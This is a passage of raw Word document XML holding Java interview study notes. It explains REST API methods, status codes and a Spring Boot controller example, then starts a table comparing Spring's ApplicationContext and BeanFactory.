          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F703F"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Updates an existing resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131ED7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UT /users/1 to update the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536FBA22"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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00448445"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Deletes a resource from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92FD57"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DELETE /users/1 to delete the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250DEE3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ATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279772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artially updates an existing resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DCB03E"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ATCH /users/1 to update specific fields of the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3562004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Communicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB1A81F"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p>
    <w:p w14:paraId="398B5832"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A client sends an HTTP request to a REST API endpoint (e.g., GET /users).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C35314"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request contains the HTTP method, headers (e.g., Content-Type, Authorization), and an optional body (for POST, PUT, or PATCH requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56E2BC"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erver Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945102C"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processes the request, performing operations like accessing the database or external services to gather the required data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A6BEE"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executes business logic and prepares a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B84B7"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17FF58F8"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sends back an HTTP response with a status code (e.g., 200 OK, 404 Not Found), headers (e.g., Content-Type), and a body (usually in JSON or XML format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04D891"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body contains the data requested by the client or a status message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F50E8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Example of How REST API Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B922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onsider a REST API for managing user information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261FF91"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1. GET Request (Retrieve user data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24960FA8" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="005430AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1849"/>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GET /users/1</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>This retrieves the information for the user with ID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3596E" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1849"/>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4BEA89A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FB0C54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3B8E2D29"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5867400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example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1141D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D17860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2. POST Request (Create a new user):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DD232" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="005430AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1850"/>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OST /users</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F5BA95"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1903A79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3C4228C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5123F02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6ABFE98B" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1850"/>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5F6F653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F8BDD01"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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA554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7895ECBD"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2AA8031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A8BBA6A"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3. PUT Request (Update user data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B304D" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="005430AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1851"/>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UT /users/1</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8D1D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997E79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239CAA08"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33B96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75C0BEA" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1851"/>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2142010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C2D338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6D1F2D7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602023A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043CB2"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599944A4"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4. DELETE Request (Delete user data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB2875"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DELETE /users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C0B63"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Status code: 204 No Content (No content returned, but the resource was deleted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CDAA9D"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Response Codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516EDC0"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0 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Successful GET or PUT request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BABB8B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1 Created</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Successful POST request, resource was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB0A45"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4 No Content</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Successful DELETE request, no content to return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25CA3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0 Bad Request</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request was malformed or invalid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CB6EF4"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1 Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The client is not authorized to access the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C71B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3 Forbidden</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The client does not have permission to access the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553429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4 Not Found</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource was not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F3F4C"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500 Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server encountered an error while processing the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C44A4" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00000000" w:rsidP="000A482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264AF">
          <v:rect id="_x0000_i2105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F020EFC"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D05B75B"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HTTP Methods Correctly</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use GET for retrieval, POST for creation, PUT for updates, and DELETE for removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5807C8"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Meaningful URIs</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Keep the URIs intuitive (e.g., /users/{id} for accessing a specific user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F68E2"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Stateless Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure each request contains all the information needed (authentication, parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D78F26"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JSON or XML for Responses</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JSON is the most common format for RESTful APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309B97F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Example in Java (Spring Boot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21E5E6"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D9C7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questMapping("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE881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ublic class UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB77120" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7BB62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GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B072A9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getUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8CBF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Fetch user from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB509D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getUserById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F481B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C645F96" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B3ED6F"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8A367"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createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169165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Save user to DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA441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createUser(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50427BF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2199D419" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256A8D1D"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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B456B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updateUser(@PathVariable Long id, @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EB73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Update user in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78916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updateUser(id, user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FDC8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346B663B" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="173DBAB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DeleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363059F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void deleteUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F92D80"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Delete user from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D538B9A"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userService.deleteUser(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F4F6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1365F6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99D53C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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A408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short, a REST API works by allowing clients to interact with resources (such as data objects or services) using standard HTTP methods, following the principles of </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless communication</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniform interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each request is independent, and the server responds with the appropriate status and data, ensuring a scalable and maintainable architecture for distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109FEACD" w14:textId="72F2DB8F"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106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684BDF7" w14:textId="36AE694B" w:rsidR="00D84A87" w:rsidRPr="00CE4B95" w:rsidRDefault="00D84A87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="_Toc197867664"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00494C5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pplication</w:t>
      </w:r>
      <w:r w:rsidR="00494C5D"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ntext and </w:t>
      </w:r>
      <w:r w:rsidR="00494C5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ean</w:t>
      </w:r>
      <w:r w:rsidR="00494C5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>actory in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p w14:paraId="444E31BC" w14:textId="2E97A682" w:rsidR="00804BC5" w:rsidRPr="004859E3" w:rsidRDefault="00804BC5" w:rsidP="004859E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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 xml:space="preserve">The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and </w:t>
      </w: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124"/>
        <w:gridCol w:w="4637"/>
      </w:tblGrid>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="562C8B35" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BB668A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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD951E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BeanFactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F276A79"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ApplicationContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="49D34DB3" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05E555C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ase Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A18B83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Factory is the root interface for the Spring IoC container.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="315FF8A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ApplicationContext is an extension of BeanFactory. It provides more advanced features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="392A0961" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A58B1D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47ABF2A1"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only when requested (lazy initialization).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A87DCB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eagerly, i.e., beans are loaded during the startup of the application (eager initialization).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="35315E50" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CB6A5F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nfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="260A5C8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asic configuration for bean management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="768DB3A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more advanced configuration, including internationalization, event propagation, and other features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="1B133947" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41FC04B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Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4CEE2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basic functionality like bean creation, configuration, and access to beans.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E58ADE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additional functionality such as event propagation, AOP (Aspect-Oriented Programming), annotation-based configuration, internationalization, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="7E264CB9" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B89168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Implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6532530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XmlBeanFactory (deprecated), DefaultListableBeanFactory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56A7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ClassPathXmlApplicationContext, AnnotationConfigApplicationContext, GenericWebApplicationContext, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004859E3" w:rsidRPr="004859E3" w14:paraId="31DB0488" w14:textId="77777777" w:rsidTr="00804BC5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
